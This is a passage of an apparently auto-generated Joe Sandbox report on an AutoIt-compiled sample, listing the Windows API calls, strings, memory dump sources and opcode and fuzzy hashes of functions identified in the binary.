                          • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                          • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                          APIs
                          • _strlen.LIBCMT ref: 0040F858
                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                          • _sprintf.LIBCMT ref: 0040F9AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove$_sprintf_strlen
                          • String ID: %02X
                          • API String ID: 1921645428-436463671
                          • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                          • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                          • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                          • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                          APIs
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: Combobox
                          • API String ID: 3850602802-2096851135
                          • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                          • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                          • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                          • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                          APIs
                          • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: LengthMessageSendTextWindow
                          • String ID: edit
                          • API String ID: 2978978980-2167791130
                          • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                          • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                          • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                          • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                          APIs
                          • Sleep.KERNEL32(00000000), ref: 00476CB0
                          • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: GlobalMemorySleepStatus
                          • String ID: @
                          • API String ID: 2783356886-2766056989
                          • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                          • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                          • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                          • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: htonsinet_addr
                          • String ID: 255.255.255.255
                          • API String ID: 3832099526-2422070025
                          • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                          • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                          • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                          • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                          APIs
                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: InternetOpen
                          • String ID: <local>
                          • API String ID: 2038078732-4266983199
                          • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                          • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                          • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                          • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __fread_nolock_memmove
                          • String ID: EA06
                          • API String ID: 1988441806-3962188686
                          • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                          • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                          • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                          • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: u,D
                          • API String ID: 4104443479-3858472334
                          • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                          • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                          • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                          • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                          APIs
                          • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • wsprintfW.USER32 ref: 0045612A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend_mallocwsprintf
                          • String ID: %d/%02d/%02d
                          • API String ID: 1262938277-328681919
                          • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                          • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                          • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                          • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                          APIs
                          • InternetCloseHandle.WININET(?), ref: 00442663
                          • InternetCloseHandle.WININET ref: 00442668
                            • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CloseHandleInternet$ObjectSingleWait
                          • String ID: aeB
                          • API String ID: 857135153-906807131
                          • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                          • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                          • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                          • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                          • PostMessageW.USER32(00000000), ref: 00441C05
                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                          • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                          • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                          • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                          • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                          • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                          • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                          APIs
                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                            • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Message_doexit
                          • String ID: AutoIt$Error allocating memory.
                          • API String ID: 1993061046-4017498283
                          • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                          • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                          • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                          • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D